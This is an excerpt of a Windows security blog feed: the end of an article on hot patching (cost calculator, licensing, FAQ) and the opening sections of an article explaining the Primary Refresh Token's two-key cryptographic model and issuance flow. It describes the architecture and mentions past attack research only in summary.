This is not a CFO-style break-even calculation -- the inputs differ too much across organizations to make a one-line answer useful. The framing question is: what does a reboot actually cost in your fleet? Revenue downtime during the maintenance window, on-call coordination overhead, the deferred-patch security risk created by the inevitable delay between Patch Tuesday and the night the operations team is willing to schedule the reboot. Microsoft Inside Track [@ms-insidetrack-hotpatch] quantifies Microsoft Digital&apos;s own number; every operator has to compute their own. A useful first-pass formula is below.
&lt;p&gt;{`
// Per-fleet break-even calculator. Inputs are organization-specific.
// The function returns whether the Arc hot-patch subscription is cheaper
// than the cost of the avoided reboots, assuming 8 hot-patch months a year
// (4 reboots/year baseline vs 12 without hot patching).&lt;/p&gt;
&lt;p&gt;function breakEven({ cores, perCoreMonthly = 1.50,
                     rebootsAvoidedPerYear = 8,
                     costPerRebootEvent,
                     fleetSize = 1 }) {
  const subscriptionAnnual = cores * perCoreMonthly * 12 * fleetSize;
  const avoidedRebootCost  = costPerRebootEvent * rebootsAvoidedPerYear * fleetSize;
  return {
    subscriptionAnnual,
    avoidedRebootCost,
    netSavings: avoidedRebootCost - subscriptionAnnual,
    worthIt: avoidedRebootCost &amp;gt; subscriptionAnnual
  };
}&lt;/p&gt;
&lt;p&gt;// Example: a 128-core box, 100-machine fleet, $1,200 per reboot event
// (coordination, downtime, ops overhead). 8 hotpatch months avoided per year.
const r = breakEven({
  cores: 128, fleetSize: 100, costPerRebootEvent: 1200, rebootsAvoidedPerYear: 8
});
console.log(&apos;Subscription annual: $&apos; + r.subscriptionAnnual.toLocaleString());
console.log(&apos;Avoided reboot cost: $&apos; + r.avoidedRebootCost.toLocaleString());
console.log(&apos;Net savings        : $&apos; + r.netSavings.toLocaleString());
console.log(&apos;Worth it           : &apos; + r.worthIt);
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The formula is: subscription cost = &lt;code&gt;cores x \$1.50 x 12 x fleet_size&lt;/code&gt;. The avoided reboot cost is &lt;code&gt;cost_per_reboot_event x rebootsAvoided x fleet_size&lt;/code&gt;. The intersection is your decision point. The most-underestimated input is the coordination cost of scheduling the reboot window across multiple operations teams in regulated organizations -- it is rarely zero and is often the largest single line item.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;10.3. Windows 11 Enterprise 24H2 client&lt;/h3&gt;
&lt;p&gt;License-gated through Intune Autopatch. The license bar, per Microsoft Learn [@ms-autopatch-hotpatch], is one of Windows 11 Enterprise E3/E5, Microsoft 365 F3, Education A3/A5, M365 Business Premium, or Windows 365 Enterprise. VBS must be on. Ineligible devices (VBS off, CHPE binaries present on Arm64, or any other policy mismatch) silently fall back to LCU; the device&apos;s user experience is unchanged except that hot-patch months still require the usual monthly reboot. Hot patching is staged via Intune Autopatch quality update policy with the hot-patch toggle enabled; eligibility detection runs per device. The Bleeping Computer coverage of the April 2025 client GA [@bleepingcomputer-win11-hotpatch] cross-confirms the dates and the licensing model.&lt;/p&gt;
&lt;p&gt;The Autopatch default-on flip [@techcommunity-autopatch-on-by-default-2026] turns hot patching into the default for eligible Windows 11 24H2 Enterprise devices in the May 2026 servicing cycle; opt-out controls become effective on April 1, 2026 for organizations that need to delay the transition.&lt;/p&gt;
&lt;h3&gt;10.4. Operational rules that apply to all three&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Quarterly baseline alignment is non-negotiable.&lt;/strong&gt; A machine that drifts off the current quarterly baseline cannot consume the next hot-patch month; it falls back to a full LCU until it realigns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unplanned baselines preempt hot-patch months for un-hotpatchable security content.&lt;/strong&gt; Operators cannot opt out of an unplanned baseline. The fix Microsoft has to ship for a kernel-struct-changing zero-day will land as a reboot-requiring LCU regardless of Hotpatch policy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitor patch state via the management plane.&lt;/strong&gt; Azure Update Manager (Server, Azure), Intune Autopatch dashboards (clients), and Arc Hotpatch (Server outside Azure) each report per-device or per-VM patch state. Alert on baseline drift; alert on Hotpatch-policy-enrolled devices that have silently fallen back to LCU.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Microsoft Digital&apos;s compliance numbers are the best public dataset on real-world hot-patch adoption: 81% compliance within 24 hours; 90% within 5 days; 95% within 3 weeks across 4.5 million devices since Windows 11 24H2 GA in April 2025 [@ms-insidetrack-hotpatch]. The Xbox team&apos;s reduction was from &quot;weeks down to just a couple of days.&quot; These are best-case numbers from a deeply Microsoft-fluent operations org; they are achievable, not universal.&lt;/p&gt;

For operators under NIST, HIPAA, PCI, or SOX-style controls, &quot;patched but not rebooted&quot; is a status that did not cleanly exist in audit frameworks five years ago. Hot patching changes what &quot;patched&quot; means in a way that some auditor checklists were not written for. Operators in regulated environments should clear the new patch state with their auditor before depending on it for compliance reporting. The mechanism is sound; the audit framework&apos;s recognition of it is the operational variable.

On a Win11 24H2 Enterprise client, the eligibility surface is partly visible via the `HotPatchRestrictions` registry key (Autopatch policy state), the VBS status (`Get-CimInstance -ClassName Win32_DeviceGuard | Select-Object SecurityServicesRunning, VirtualizationBasedSecurityStatus`), and the current servicing baseline build. Combining the three -- VBS on, Hotpatch policy enrolled, current quarterly baseline applied -- predicts whether the next month&apos;s release will land as a hot patch or as an LCU.
&lt;p&gt;The remaining questions are the ones every reader hits. The FAQ is next.&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;

No. The mechanism is different (in-place `.text` rewrite of a signed PE image directed by HPAT, instead of an ftrace `mcount` trampoline redirecting callers to a replacement function). The trust anchor is different (the Secure Kernel in VTL1 under HVCI, instead of the kernel module-signing policy enforced by the same kernel being patched). The scope is different (user-mode DLLs and EXEs, drivers, the hypervisor, and the Secure Kernel itself, vs kernel-only on Linux mainline). The consistency model is different (per-process callback in `ntdll`, no global pause, vs Linux&apos;s hybrid kGraft + kpatch + idle-loop + forced-signal model [@kernel-livepatch-doc]). The two systems solve the same operational problem with structurally different primitives.

No. Per Microsoft&apos;s April 2025 Windows Server blog [@ms-blog-server2025-hotpatch], reboots drop from 12 a year to 4 a year on eligible fleets. The four quarterly baseline LCUs remain mandatory. Unplanned baselines (kernel struct changes, SSUs, drivers, language packs, any non-hotpatchable security content) preempt hot-patch months and require a reboot.

No. Drivers are excluded from the Hotpatch envelope [@ms-server-hotpatch], including ELAM drivers and boot-loader components. Driver updates that ship as security fixes will land via the regular LCU on the next quarterly baseline (or sooner, as an unplanned baseline).

Microsoft frames Azure Arc as the delivery channel for Server 2025 hot patching outside Azure and meters the subscription at \$1.50 USD per CPU core per month [@ms-blog-server2025-hotpatch]. On Azure IaaS and Azure Local for Server 2025 Datacenter: Azure Edition VMs, hot patching is free. The Arc subscription is the first time a major OS vendor has metered live patching with a per-CPU-core meter (Canonical Livepatch is priced per machine; Oracle Ksplice is bundled into Oracle Linux Premier Support priced per CPU pair). The economic case is fleet-dependent and is the subject of §10.

In practice, yes. The Windows OS Platform team&apos;s November 2021 blog [@ms-techcommunity-hotpatch-nov2021] is explicit: the hotpatch engine requires the Secure Kernel to be running. The Autopatch documentation [@ms-autopatch-hotpatch] extends the requirement to clients: VBS must be turned on for a device to be offered Hotpatch updates. Server 2025 / Server 2022 Azure Edition treat the Secure Kernel as load-bearing for patch validation. VBS-off devices silently fall back to LCU.

Yes, technically. The Server 2003 SP1 hot-patch engine shipped via the `/hotpatch` compile flag, `.hotp1` PE sections [@openrce-patching-internals], and `NtSetSystemInformation(SystemHotpatchInformation)` (as walked through in Johannes Passing&apos;s 2011 reverse-engineering writeup [@jpassing-hotpatching]). It was operationally rare, never had a trust anchor architecturally distinct from the kernel code it mutated, and was first publicly documented as an APT code-injection primitive in Microsoft&apos;s April 2016 PLATINUM report [@thehackernews-platinum] (PLATINUM as a group dates to 2009; the exact start date for its hot-patch tradecraft is not in the public record). The modern pipeline is a 17-year revival on a different foundation -- a dedicated syscall, signed PE32+ patch images, and verification by the Secure Kernel in VTL1.
&lt;p&gt;Hot patching is a pipeline, not a feature. The mechanism Microsoft shipped in February 2022 is older than the public product; the real engineering work between 2003 and 2022 was the trust anchor (the Secure Kernel under HVCI, mature only after 2015), the servicing discipline (cumulative-update model from 2016, hot-patch / baseline cadence from 2022), and the management plane (Azure Update Manager, then Intune Autopatch, then Azure Arc, each a separate operations product layered on the same kernel engine). The mechanism is the easy part. The hard part is the architecture around it that makes in-memory mutation safe to operate at fleet scale.&lt;/p&gt;
&lt;p&gt;Whether $1.50 per CPU core per month is worth it for your fleet is a math problem you can now do. Whether the Confidential VM attestation interaction gets cleanly documented before the next product wave is somebody else&apos;s problem. The compiler flag has not changed in 30 years. Everything around it has.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;hot-patching-in-windows&quot; keyTerms={[
  { term: &quot;HPAT&quot;, definition: &quot;Hot Patch Address Table; the per-function patch-site table inside IMAGE_HOT_PATCH_BASE.PatchTable, enumerating each individual function-level patch site.&quot; },
  { term: &quot;IMAGE_HOT_PATCH_BASE&quot;, definition: &quot;PE32+ structure carrying OriginalTimeDateStamp and OriginalCheckSum binding fields plus a pointer to the HPAT; used by the kernel to verify a hot-patch PE matches the exact build of its base image.&quot; },
  { term: &quot;NtManageHotPatch&quot;, definition: &quot;Dedicated NT syscall (Windows 11 / Server 2022+) that manages hot-patch creation, activation, mapping, and listing via HOT_PATCH_INFORMATION_CLASS dispatch.&quot; },
  { term: &quot;Secure Kernel&quot;, definition: &quot;The kernel-side counterpart to Isolated User Mode running in VTL1 under VBS; in the hot-patch pipeline it verifies signed patch payloads and performs the .text rewrite under HVCI.&quot; },
  { term: &quot;LCU&quot;, definition: &quot;Latest Cumulative Update; Microsoft&apos;s monthly full security-and-quality bundle. Hot patching uses an LCU as the quarterly baseline and ships only the security delta in the two hotpatch-only months between baselines.&quot; },
  { term: &quot;ftrace&quot;, definition: &quot;Linux&apos;s in-kernel function tracer; the substrate that both kpatch and kGraft used to install live-patch trampolines, and the mechanism by which the in-tree mainline livepatch redirects callers of a patched function.&quot; },
  { term: &quot;Consistency model&quot;, definition: &quot;The set of rules a live-patcher uses to decide when a thread of execution has finished using the old version of a function and may begin using the new one. Linux uses a hybrid of stack-check + per-task + kernel-exit + idle-loop. Windows uses per-process notification with no global pause.&quot; },
  { term: &quot;Unplanned baseline&quot;, definition: &quot;A quarterly-cycle interruption in which a month that would normally be hotpatch-only ships a full LCU instead, because the month&apos;s security content is not hot-patchable (kernel struct changes, drivers, SSUs, etc.).&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>hot-patching</category><category>hpat</category><category>secure-kernel</category><category>vbs-hvci</category><category>live-patching</category><category>azure-arc</category><category>ntmanagehotpatch</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Inside the Primary Refresh Token: The Cryptographic Seam Between Windows Logon and Microsoft Entra ID</title><link>https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/</link><guid isPermaLink="true">https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/</guid><description>How one TPM-bound JWT issued at first sign-in bridges Windows logon and Microsoft Entra ID -- and how Pass-the-PRT taught Microsoft to bind the derivation to the message.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
The **Primary Refresh Token (PRT)** is the cryptographic seam where a Windows logon becomes a Microsoft Entra ID transaction. It is a JWT issued by Microsoft Entra ID to the CloudAP plugin in `lsass` at first interactive sign-in on an Entra-registered, Entra-joined, or Entra-hybrid-joined device. The PRT is signed at issuance by a TPM-bound **device key** (`dkpriv`); every downstream artifact -- the `x-ms-RefreshTokenCredential` browser cookie, app-token requests via WAM, Conditional Access claim flow -- is signed by a session key returned encrypted under the device&apos;s **transport key** (`tkpub`). In 2020, Dirk-jan Mollema and Lee Christensen showed that even with TPM-bound keys, admin on the live device could mint cookies anywhere -- the Pass-the-PRT class. Microsoft closed off-device replay with **KDFv2** (CVE-2021-33779, July 2021), then layered Continuous Access Evaluation, Token Protection, and Cloud Kerberos Trust on top. On-device Cookie-on-Demand attacks remain the open residual.
&lt;h2&gt;1. Three sign-ins, one credential&lt;/h2&gt;
&lt;p&gt;A user signs into a freshly enrolled Entra-joined laptop with &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello for Business&lt;/a&gt;. Ten seconds later they open Outlook, which silently authenticates against Microsoft 365. An hour later they type &lt;code&gt;outlook.office.com&lt;/code&gt; into Edge -- and they are already signed in there too.&lt;/p&gt;
&lt;p&gt;Three sign-ins, one credential. The credential was issued during the Windows logon itself, and the user has never seen it.&lt;/p&gt;
&lt;p&gt;This article is about that credential -- the &lt;strong&gt;Primary Refresh Token&lt;/strong&gt; -- and about the cryptographic seam where Windows logon stops being a local NT-style event and becomes a Microsoft Entra ID transaction.&lt;/p&gt;

A device-bound JSON Web Token issued by Microsoft Entra ID to the Cloud Authentication Provider in `lsass.exe` at first interactive sign-in on a Microsoft Entra-registered, Entra-joined, or Entra-hybrid-joined device. The PRT is the artifact every other token broker on the device references to mint app access tokens, browser SSO cookies, and Conditional Access claims for the lifetime of the sign-in session [@prt-msft-learn].
&lt;p&gt;The questions worth asking are concrete. What does that token actually contain? How did it get from &lt;code&gt;lsass&lt;/code&gt; to a browser cookie without the user ever pasting it? Why is the cookie that rides in the browser called &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; when the PRT itself never leaves the device? And -- the question that will define everything in §5 and §6 -- if the credential is bound to a TPM, how did three independent researchers in the summer of 2020 mint cookies anywhere they wanted to?&lt;/p&gt;
&lt;p&gt;The plan is to answer those questions in order. We will name every load-bearing primitive in the stack. We will walk a token request end-to-end. We will explain what the July 2021 KDFv2 patch actually changed at the byte level. And we will be honest about what the PRT cannot do -- because the rest of this series is about the identity surfaces that run alongside it, not under it.&lt;/p&gt;
&lt;p&gt;Before we can read the PRT itself, we have to understand the problem it was built to solve. That means going back to 2013, before Azure AD Join was a thing.&lt;/p&gt;
&lt;h2&gt;2. The cloud-identity gap, 2011 to 2014&lt;/h2&gt;
&lt;p&gt;Windows authentication, in 2011, did not speak cloud. &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt; resolved against a local SAM database. &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&lt;/a&gt; resolved against an on-prem Key Distribution Center. Both predate the notion of a cloud identity provider by more than a decade. When a Windows endpoint authenticated, it talked to a domain controller it could see on the network -- and if it could not see a domain controller, it talked to the local SAM and called it a day.&lt;/p&gt;
&lt;p&gt;For a cloud-only workload, that left a gap shaped like a question. Where, exactly, does the user&apos;s identity live when there is no on-prem domain to resolve it against?&lt;/p&gt;
&lt;p&gt;The first answer was OAuth. RFC 6749 had shipped in October 2012, edited by Dick Hardt while at Microsoft, with refresh tokens explicitly modeled as long-lived bearer credentials redeemed at a token endpoint for short-lived access tokens [@rfc-6749]. Microsoft&apos;s Active Directory Authentication Library -- ADAL -- took the obvious next step: every application that wanted to talk to Microsoft&apos;s cloud APIs got its own client, its own redirect, and its own refresh token. SSO was approximated by sharing the underlying password prompt or, on a domain-joined machine, by hoping Integrated Windows Authentication smuggled the right Kerberos ticket to the right endpoint.&lt;/p&gt;
&lt;p&gt;That patchwork held for a while. It also taught Microsoft two things.&lt;/p&gt;
&lt;p&gt;The first lesson was about Conditional Access. If every app maintained its own refresh-token cache and re-presented credentials independently, the policy engine could only see what each token request happened to surface. Whether the request came from a managed Surface or from an unmanaged consumer laptop was anyone&apos;s guess. The device, in other words, was invisible.&lt;/p&gt;
&lt;p&gt;The second lesson was about the user. Ten apps meant ten silent renewal pipelines, ten password prompts when those pipelines broke, and ten different broker components asking &quot;are you sure?&quot; in slightly different language. The user experience and the security posture were on the same side of the ledger: both wanted a single device-bound credential that every broker could reference.&lt;/p&gt;
&lt;p&gt;The first move was small. On 28 June 2013, Adam Hall announced &lt;strong&gt;Workplace Join&lt;/strong&gt; as part of Windows Server 2012 R2: a device-registration primitive that put an X.509 certificate from the Device Registration Service into Active Directory, so that &quot;users can register their device using Workplace Join which creates a new device object in Active Directory and installs a certificate on the device, allowing IT to take into account the user&apos;s device authentication as part of conditional access policies&quot; [@workplace-join-2013].&lt;/p&gt;
&lt;p&gt;Workplace Join taught the directory that a device existed. It did not make the Windows sign-in itself a cloud event. The artifact it produced was a long-lived certificate, not a session-scoped credential, and it lived on the on-prem AD side of the seam, not the cloud side. For the rest, Microsoft would need a credential the cloud could mint &lt;em&gt;during&lt;/em&gt; the sign-in.&lt;/p&gt;
&lt;p&gt;That credential arrived in 2015 -- but its design took another year to harden.&lt;/p&gt;
&lt;h2&gt;3. Workplace Join, Azure AD Join, and the OAuth-refresh-token patchwork&lt;/h2&gt;
&lt;p&gt;What does it cost a Windows endpoint to authenticate to ten cloud apps if it has no PRT?&lt;/p&gt;
&lt;p&gt;Counting tokens is a good way to find out. Each app maintains its own refresh-token cache. Each refresh redeems against the same &lt;code&gt;login.microsoftonline.com&lt;/code&gt; endpoint but with a different &lt;code&gt;client_id&lt;/code&gt; and a different audience claim. Each app re-asserts the device claim as a separate transaction -- if it can; an app that does not ride a broker can only surface what its own credential flow knows. The architectural failure mode is not that authentication is &lt;em&gt;bad&lt;/em&gt;; it is that authentication is &lt;em&gt;redundant&lt;/em&gt;, and the policy engine sees a hundred small claims instead of one big one.&lt;/p&gt;
&lt;p&gt;Microsoft walked out of that failure mode in three steps.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step one (June 2013): Workplace Join.&lt;/strong&gt; A device cert, signed by the Device Registration Service, written to a new device object in Active Directory. Adam Hall&apos;s announcement is the load-bearing primary source [@workplace-join-2013]. Nothing about a session: the certificate lives across reboots, across sign-ins, across user accounts. Microsoft now calls this state &lt;strong&gt;Microsoft Entra registered&lt;/strong&gt; -- the same primitive, renamed [@entra-devices-overview].&quot;Workplace Join&quot; was the 2013 marketing name. The same artifact is now called &quot;Microsoft Entra registered&quot; and is the device state used for personal (BYOD) devices that get conditional-access policies applied to corporate workloads. The taxonomy in §3 of the current Microsoft Learn documentation lists three states: Microsoft Entra registered, Microsoft Entra joined, and Microsoft Entra hybrid joined [@entra-devices-overview].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Step two (May 2015): Azure AD Join.&lt;/strong&gt; On 28 May 2015, Alex Simons and Gary Henderson announced that Windows 10, build 1507, would let a device sign in against a cloud-only Microsoft identity at first boot. &quot;Azure AD join is optimized for users that primarily access cloud resources,&quot; the announcement reads -- a quiet way of saying that for the first time, a Windows machine did not need a domain controller on the network to give a user a sign-in surface [@techcomm-azure-ad-join-2015].&lt;/p&gt;
&lt;p&gt;This 28 May 2015 Tech Community post is the corrected primary source. An older URL in the same series (&lt;code&gt;.../ba-p/247010&lt;/code&gt;) was re-tagged by Microsoft&apos;s CMS to a 2010 RemoteFX article and now resolves to unrelated content; the 244005 post is the load-bearing technical announcement.&lt;/p&gt;
&lt;p&gt;The Azure AD Join story introduced one more component: &lt;strong&gt;CloudAP&lt;/strong&gt;, the Cloud Authentication Provider, an authentication-package framework hosted inside &lt;code&gt;lsass.exe&lt;/code&gt;. CloudAP is the LSASS-resident broker that an enterprise SSO surface talks to from inside the operating system. It is not yet a PRT engine -- in May 2015, it is mostly a routing layer for cloud sign-in primitives. The PRT itself does not exist yet.&lt;/p&gt;

A pluggable authentication-package framework introduced inside `lsass.exe` to host cloud-identity sign-in plugins. The Microsoft Entra ID plugin (`aadcloudap.dll`) is the canonical implementation; CloudAP is the LSASS-resident broker that, from Windows 10 1607 onward, owns the device-side PRT lifecycle on Entra-joined and Entra-hybrid-joined machines [@prt-msft-learn].
&lt;p&gt;&lt;strong&gt;Step three (August 2016): the first PRT.&lt;/strong&gt; Windows 10, version 1607 -- the Anniversary Update -- began rolling out on 2 August 2016 [@win10-anniv-1607]. In that build, CloudAP gained an Entra ID plugin that minted a PRT during interactive sign-in, alongside a &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM&lt;/a&gt;-bound key pair for proof of possession. From that moment, every other broker on the machine -- the Web Account Manager that backed native apps, Edge for browser SSO, third-party &lt;code&gt;mstsc&lt;/code&gt; flows that wanted to redirect a sign-in -- had a single artifact to reference. The architectural gap from §2 closed; the patchwork became a stack.&lt;/p&gt;
&lt;p&gt;By the time Microsoft Open Specifications publication MS-OAPXBC went public on 16 October 2015, version 1.0 -- contemporaneous with the Windows 10 1507 release, not three years later -- the protocol scaffolding was already in place [@ms-oapxbc-index]. The PRT itself was the credential the scaffolding had been waiting for.&lt;/p&gt;
&lt;p&gt;By 2016, Microsoft had a name for the missing primitive: one device-bound, session-scoped, cloud-issued credential that all brokers could reference. The Anniversary Update made it real. The next question is what that credential &lt;em&gt;is&lt;/em&gt; cryptographically -- and to answer that, we need to be precise about two key pairs that most descriptions of the PRT conflate.&lt;/p&gt;

timeline
    title PRT generations, 2013 to 2022
    2013 : Workplace Join (Windows Server 2012 R2)
         : Device cert in AD; no session credential
    2015 : Azure AD Join (Windows 10 1507)
         : CloudAP framework in lsass; no PRT yet
    2016 : First PRT (Windows 10 1607)
         : CloudAP + Entra plugin issue device-bound JWT
    2020 : Pass-the-PRT class disclosed
         : Christensen + Mollema + Syynimaa
    2021 : KDFv2 (CVE-2021-33779)
         : SHA256 of payload mixed into derivation
    2022 : CAE GA + Cloud Kerberos Trust + TROOPERS 22
         : Composition era begins
&lt;h2&gt;4. The two-key cryptographic model&lt;/h2&gt;
&lt;p&gt;Most descriptions of the PRT online say the cookie is &quot;DKey-signed.&quot; That phrase has been wrong since July 2021. Here is the actual cryptographic substrate.&lt;/p&gt;
&lt;p&gt;When a Windows device joins Microsoft Entra ID -- by way of the Out-of-Box Experience, by &lt;code&gt;dsreg&lt;/code&gt;&apos;s join command, or by the implicit registration that happens on a personal device -- the registration component generates &lt;strong&gt;two&lt;/strong&gt; key pairs on the device. One pair signs PRT &lt;em&gt;issuance&lt;/em&gt; requests. The other unwraps session keys returned &lt;em&gt;with&lt;/em&gt; the PRT. Microsoft&apos;s own documentation enumerates the two pairs the &lt;code&gt;dsreg&lt;/code&gt; component generates at device registration: Device key (&lt;code&gt;dkpub&lt;/code&gt;/&lt;code&gt;dkpriv&lt;/code&gt;) and Transport key (&lt;code&gt;tkpub&lt;/code&gt;/&lt;code&gt;tkpriv&lt;/code&gt;) [@prt-msft-learn].&lt;/p&gt;

The first of the two key pairs minted at Microsoft Entra registration. The private half (`dkpriv`) is TPM-resident on supported hardware (TPM 2.0 from Windows 10 1903 onward) and signs the JWT used to *request* a Primary Refresh Token from Microsoft Entra ID. The public half (`dkpub`) is registered with Microsoft Entra ID at join time and is what Entra ID uses to verify that the request originated from the registered device [@prt-msft-learn].

The second registration-time key pair. Entra ID encrypts the freshly minted PRT session key under `tkpub`; only `tkpriv` -- TPM-resident on supported hardware -- can unwrap it. Every downstream signing operation flows through a key derived from that session key, so the transport key is the asymmetric on-ramp to the device&apos;s symmetric proof-of-possession surface [@prt-msft-learn].

The Windows component that performs Microsoft Entra registration -- mints the device and transport key pairs, registers `dkpub`/`tkpub` with Entra ID, and produces the device certificate that backs the Microsoft Entra device object. `dsregcmd.exe` is its operator-facing interrogation tool; `dsregcmd /status` reports current state including AzureAdPrt, AzureAdPrtUpdateTime, and AzureAdPrtExpiryTime [@prt-msft-learn].
&lt;p&gt;The two-key model is not a typo, and the second-most-common reading of it is wrong. The device key signs &lt;em&gt;the request for&lt;/em&gt; a PRT. The transport key unwraps &lt;em&gt;the session key that arrives with&lt;/em&gt; a PRT. Once unwrapped, the session key signs everything from there on -- not the device key.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The device key signs PRT issuance, once per PRT mint. The transport key unwraps a &lt;em&gt;session key&lt;/em&gt;. Every downstream artifact -- the &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; browser cookie, every WAM-mediated app-token request -- is signed by a key &lt;em&gt;derived from&lt;/em&gt; that session key, not by &lt;code&gt;dkpriv&lt;/code&gt; directly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The eight-step issuance flow makes this explicit.&lt;/p&gt;

sequenceDiagram
    participant User
    participant CloudAP as CloudAP (lsass)
    participant TPM
    participant Entra as Microsoft Entra ID
    participant CA as Conditional Access
    participant WAM
    User-&amp;gt;&amp;gt;CloudAP: 1. Interactive sign-in (Hello, password, FIDO2)
    CloudAP-&amp;gt;&amp;gt;TPM: 2. Sign authorization JWT with dkpriv
    TPM--&amp;gt;&amp;gt;CloudAP: 3. Signed assertion
    CloudAP-&amp;gt;&amp;gt;Entra: 4. Issuance request (signed assertion)
    Entra-&amp;gt;&amp;gt;CA: 5. Evaluate device + user + risk claims
    CA--&amp;gt;&amp;gt;Entra: 6. Issuance permitted
    Entra--&amp;gt;&amp;gt;CloudAP: 7. PRT + session_key encrypted under tkpub
    CloudAP-&amp;gt;&amp;gt;TPM: 8. Unwrap session_key with tkpriv
    Note over CloudAP,WAM: Session key now resident -- WAM, browser SSO, and CAE all derive from it
&lt;p&gt;A user provides an interactive credential -- a Hello gesture, a password, a FIDO2 security key. The CloudAP plugin in &lt;code&gt;lsass&lt;/code&gt; constructs a JWT carrying the user&apos;s authorization material and asks the TPM to sign it with &lt;code&gt;dkpriv&lt;/code&gt;. That signed assertion goes to Microsoft Entra ID. Entra evaluates Conditional Access; if the device, the user, and the risk profile pass policy, Entra returns a PRT (a long-lived JWT) and a fresh session key encrypted under &lt;code&gt;tkpub&lt;/code&gt;. The TPM unwraps the session key with &lt;code&gt;tkpriv&lt;/code&gt;. The session key now lives on the device, in CloudAP&apos;s hot path, available for every broker to use.&lt;/p&gt;

The symmetric key Microsoft Entra ID generates per PRT mint and returns to the device encrypted under `tkpub`. After the TPM unwraps it with `tkpriv`, the session key is the *proof-of-possession key* for the PRT lifetime: every renewal request, every `x-ms-RefreshTokenCredential` cookie, and every app-token request signed via the Web Account Manager is HMAC-signed by a key *derived from* the session key via SP800-108 KDF [@prt-msft-learn] [@ms-oapxbc-jwt].
&lt;p&gt;The session key is the part the rest of this article keeps coming back to. It is the artifact that, in 2020, three independent researchers would prove the TPM was not protecting in the way Microsoft&apos;s documentation implied.&lt;/p&gt;
&lt;p&gt;Once the session key is on the device, the &lt;strong&gt;Web Account Manager (WAM)&lt;/strong&gt; -- the user-mode broker process that handles native-app token requests -- and the browser SSO surface used by Edge, Chrome, and Firefox can mint subordinate artifacts. The most interesting one is a cookie.&lt;/p&gt;

The Windows user-mode broker that mediates access-token requests from native applications to Microsoft Entra ID. WAM presents each app-token request alongside a PRT-derived signed assertion, eliminating the per-app refresh-token cache that the pre-2016 ADAL design required. WAM is the Windows analogue of the Microsoft Enterprise SSO plug-in for Apple devices [@prt-msft-learn] [@apple-sso-plugin-learn].

The HTTP cookie Edge, Chrome, and Firefox attach to requests against `login.microsoftonline.com` and a small set of Microsoft cloud surfaces. It carries a JWT signed with `alg: HS256` whose header field `kdf_ver` indicates whether the cookie used KDFv1 or KDFv2 derivation [@ms-oapxbc-jwt]. The cookie is what makes the third sign-in in the §1 hook -- the silent Edge sign-in to `outlook.office.com` -- not require a credential prompt.
&lt;p&gt;Inside that cookie, the signing key is &lt;strong&gt;derived&lt;/strong&gt; from the session key via the SP800-108 key-derivation function. The label is the constant string &lt;code&gt;AzureAD-SecureConversation&lt;/code&gt;. The context (&lt;code&gt;ctx&lt;/code&gt;) is a per-cookie value chosen by the client. The MS-OAPXBC protocol specification gives the rule verbatim: under KDFv2, &quot;the client MUST use SHA256(ctx || assertion payload) instead of ctx as the context for deriving the signing key&quot; [@ms-oapxbc-jwt]. We will come back to that sentence in §6, because it is &lt;em&gt;the&lt;/em&gt; sentence.Microsoft Learn documents TPM 2.0 as the recommended version for all Microsoft Entra device-registration scenarios on Windows 10 or newer, and states that after the Windows 10 1903 update, Microsoft Entra ID no longer uses TPM 1.2 for any of the PRT keys due to reliability issues. In practice, TPM 2.0 is the only supported configuration on Windows 10 1903 or higher [@prt-msft-learn].&lt;/p&gt;
&lt;p&gt;On supported hardware, both &lt;code&gt;dkpriv&lt;/code&gt; and &lt;code&gt;tkpriv&lt;/code&gt; are non-extractable TPM 2.0 keys. On a device with &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Microsoft Pluton&lt;/a&gt; (a TPM 2.0 implementation embedded in the SoC), the same model applies; Pluton is a TPM 2.0 implementation, not a replacement. On non-TPM Windows -- a virtual machine without a vTPM, a desktop where the TPM is disabled, certain consumer SKUs -- DPAPI is the fallback. DPAPI-protected keys live in user-profile state and can be unwrapped with the user&apos;s credentials, which is a meaningfully weaker contract than TPM non-extractability. We will come back to that distinction in §9.&lt;/p&gt;

